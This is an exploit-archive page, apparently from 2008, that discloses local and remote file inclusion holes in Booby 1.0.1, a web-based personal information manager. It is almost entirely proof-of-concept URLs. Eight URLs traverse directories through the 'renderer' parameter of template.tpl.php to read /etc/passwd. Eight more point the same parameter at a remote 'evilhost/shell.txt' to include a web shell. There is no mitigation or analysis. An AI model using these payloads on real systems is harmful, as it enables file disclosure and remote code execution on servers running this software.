[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Booby 1.0.1 Multiple Remote File Inclusion Vulnerabilities
# Published : 2008-06-02
# Author : HaiHui
# Previous Title : Joomla Component acctexp <= 0.12.x Blind SQL Injection Exploit
# Next Title : Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability
#software name: Booby
#version: 1.0.1
#description: A Webbased Personal Information Manager (PIM) with support for bookmarks, calendar, contacts, notes, news and tasks.
#download: http://sourceforge.net/project/showfiles.php?group_id=87672&package_id=91447&release_id=326826
#bug: Multiple Remote Vulnerabilities
#contact: mailbox1333@gmail.com
Local File Include / Remote File Include in: template.tpl.php
Proof Of Concept LFI: http://localhost/path/templates/barrel/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/barry/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/mylook/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/oerdec/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/penguin/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/sidebar/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/slashdot/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/text-only/template.tpl.php?renderer=../../../../../../etc/passwd
Proof Of Concept RFI: http://localhost/path/templates/barrel/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/barry/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/mylook/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/oerdec/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/penguin/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/sidebar/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/slashdot/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/text-only/template.tpl.php?renderer=evilhost/shell.txt
regards> ph03n1xbroc / zuh_runezz / sara / sirzion / ov / mozi / picolo_elfo /
# www.Syue.com [2008-06-02]